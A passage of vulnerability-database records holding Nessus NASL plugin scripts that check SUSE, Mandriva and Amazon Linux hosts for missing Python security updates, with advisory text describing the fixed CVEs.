"SUSE_SU-2015-1344-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85250", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1344-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85250);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 66958, 68147, 70089);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : python (SUSE-SU-2015:1344-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to python 2.7.9 fixes the following issues :\n\n - python-2.7-libffi-aarch64.patch: Fix argument passing in\n libffi for aarch64\n\nFrom the version update to 2.7.9 :\n\n - contains full backport of ssl module from Python 3.4\n (PEP466)\n\n - HTTPS certificate validation enabled by default (PEP476)\n\n - SSLv3 disabled by default (bnc#901715)\n\n - backported ensurepip module (PEP477)\n\n - fixes several missing CVEs from last release:\n CVE-2013-1752, CVE-2013-1753\n\n - dropped upstreamed patches: python-2.7.6-poplib.patch,\n smtplib_maxline-2.7.patch, xmlrpc_gzip_27.patch\n\n - dropped patch python-2.7.3-ssl_ca_path.patch because we\n don't need it with ssl module from Python 3\n\n - libffi was upgraded upstream, seems to contain our\n changes, so dropping libffi-ppc64le.diff as well\n\n - python-2.7-urllib2-localnet-ssl.patch - properly remove\n unconditional 'import ssl' from test_urllib2_localnet\n that caused it to fail without ssl\n\n - skip test_thread in qemu_linux_user mode\n\nFrom the version update to 2.7.8 :\n\n - fixes CVE-2014-4650 directory traversal in CGIHTTPServer\n\n - fixes CVE-2014-7185 (bnc#898572) potential buffer\n overflow in buffer()\n\nAlso the DH parameters were increased to 2048 bit to fix logjam\nsecurity issue (bsc#935856)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=898572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=901715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-1752/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-1753/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4650/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151344-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8b2cb590\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2015-367=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-367=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-367=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-367=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpython2_7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpython2_7-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpython2_7-1_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-base-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-curses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-curses-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-gdbm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-gdbm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-idle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-xml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpython2_7-1_0-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpython2_7-1_0-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-base-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-base-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-base-debugsource-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-curses-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-curses-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-debugsource-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-demo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-gdbm-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-gdbm-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-idle-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-tk-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-tk-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-xml-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-xml-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpython2_7-1_0-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpython2_7-1_0-debuginfo-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-base-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-base-debuginfo-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"python-debuginfo-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-debuginfo-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-base-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-base-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-base-debuginfo-32bit-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-base-debugsource-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-curses-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-curses-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-debugsource-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-devel-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-tk-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-tk-debuginfo-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-xml-2.7.9-14.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"python-xml-debuginfo-2.7.9-14.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-01T07:30:20", "description": "Updated python packages fix security vulnerabilities :\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThis updates the python package to version 2.7.6, which fixes several\nother bugs, including denial of service flaws due to unbound\nreadline() calls in the ftplib and nntplib modules (CVE-2013-1752).\n\nDenial of service flaws due to unbound readline() calls in the\nimaplib, poplib, and smtplib modules (CVE-2013-1752).\n\nA gzip bomb and unbound read denial of service flaw in python XMLRPC\nlibrary (CVE-2013-1753).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).\n\nPython before 2.7.8 is vulnerable to an integer overflow in the buffer\ntype (CVE-2014-7185).\n\nWhen Python's standard library HTTP clients (httplib, urllib, urllib2,\nxmlrpclib) are used to access resources with HTTPS, by default the\ncertificate is not checked against any trust store, nor is the\nhostname in the certificate checked against the requested host. It was\npossible to configure a trust root to be checked against, however\nthere were no faculties for hostname checking (CVE-2014-9365).\n\nThe python-pip and tix packages was added due to missing build\ndependencies.", "edition": 24, "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : python (MDVSA-2015:075)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2020-11-02T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "p-cpe:/a:mandriva:linux:tix-devel", "p-cpe:/a:mandriva:linux:python-pip", "p-cpe:/a:mandriva:linux:tkinter-apps", "cpe:/o:mandriva:business_server:2", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:python3-pip", "p-cpe:/a:mandriva:linux:lib64python-devel", "p-cpe:/a:mandriva:linux:tix"], "id": "MANDRIVA_MDVSA-2015-075.NASL", "href": "https://www.tenable.com/plugins/nessus/82328", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:075. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82328);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-1912\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_xref(name:\"MDVSA\", value:\"2015:075\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2015:075)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages fix security vulnerabilities :\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThis updates the python package to version 2.7.6, which fixes several\nother bugs, including denial of service flaws due to unbound\nreadline() calls in the ftplib and nntplib modules (CVE-2013-1752).\n\nDenial of service flaws due to unbound readline() calls in the\nimaplib, poplib, and smtplib modules (CVE-2013-1752).\n\nA gzip bomb and unbound read denial of service flaw in python XMLRPC\nlibrary (CVE-2013-1753).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).\n\nPython before 2.7.8 is vulnerable to an integer overflow in the buffer\ntype (CVE-2014-7185).\n\nWhen Python's standard library HTTP clients (httplib, urllib, urllib2,\nxmlrpclib) are used to access resources with HTTPS, by default the\ncertificate is not checked against any trust store, nor is the\nhostname in the certificate checked against the requested host. It was\npossible to configure a trust root to be checked against, however\nthere were no faculties for hostname checking (CVE-2014-9365).\n\nThe python-pip and tix packages was added due to missing build\ndependencies.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0139.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0399.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-pip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3-pip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python-docs-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python-pip-1.4.1-4.2.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python3-pip-1.4.1-4.2.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tix-8.4.3-9.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tix-devel-8.4.3-9.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.9-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:13:48", "description": "It was discovered that Python built-in module CGIHTTPServer does not\nproperly handle URL-encoded path separators in URLs which may enable\nattackers to disclose a CGI script's source code or execute arbitrary\nscripts in the server's document root. (CVE-2014-4650)\n\nInteger overflow in bufferobject.c in Python before 2.7.8 allows\ncontext-dependent attackers to obtain sensitive information from\nprocess memory via a large size and offset in a 'buffer' function.\n(CVE-2014-7185)", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-06T00:00:00", "title": "Amazon Linux AMI : python27 (ALAS-2014-440)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7185", "CVE-2014-4650"], "modified": "2014-11-06T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:python27-libs", "p-cpe:/a:amazon:linux:python27", "p-cpe:/a:amazon:linux:python27-test", "p-cpe:/a:amazon:linux:python27-debuginfo", "p-cpe:/a:amazon:linux:python27-devel", "p-cpe:/a:amazon:linux:python27-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-440.NASL", "href": "https://www.tenable.com/plugins/nessus/78873", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-440.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78873);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"ALAS\", value:\"2014-440\");\n\n script_name(english:\"Amazon Linux AMI : python27 (ALAS-2014-440)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Python built-in module CGIHTTPServer does not\nproperly handle URL-encoded path separators in URLs which may enable\nattackers to disclose a CGI script's source code or execute arbitrary\nscripts in the server's document root. (CVE-2014-4650)\n\nInteger overflow in bufferobject.c in Python before 2.7.8 allows\ncontext-dependent attackers to obtain sensitive information from\nprocess memory via a large size and offset in a 'buffer' function.\n(CVE-2014-7185)\"\n );\n # http://bugs.python.org/issue21766\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.python.org/issue21766\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-440.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update python27' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = 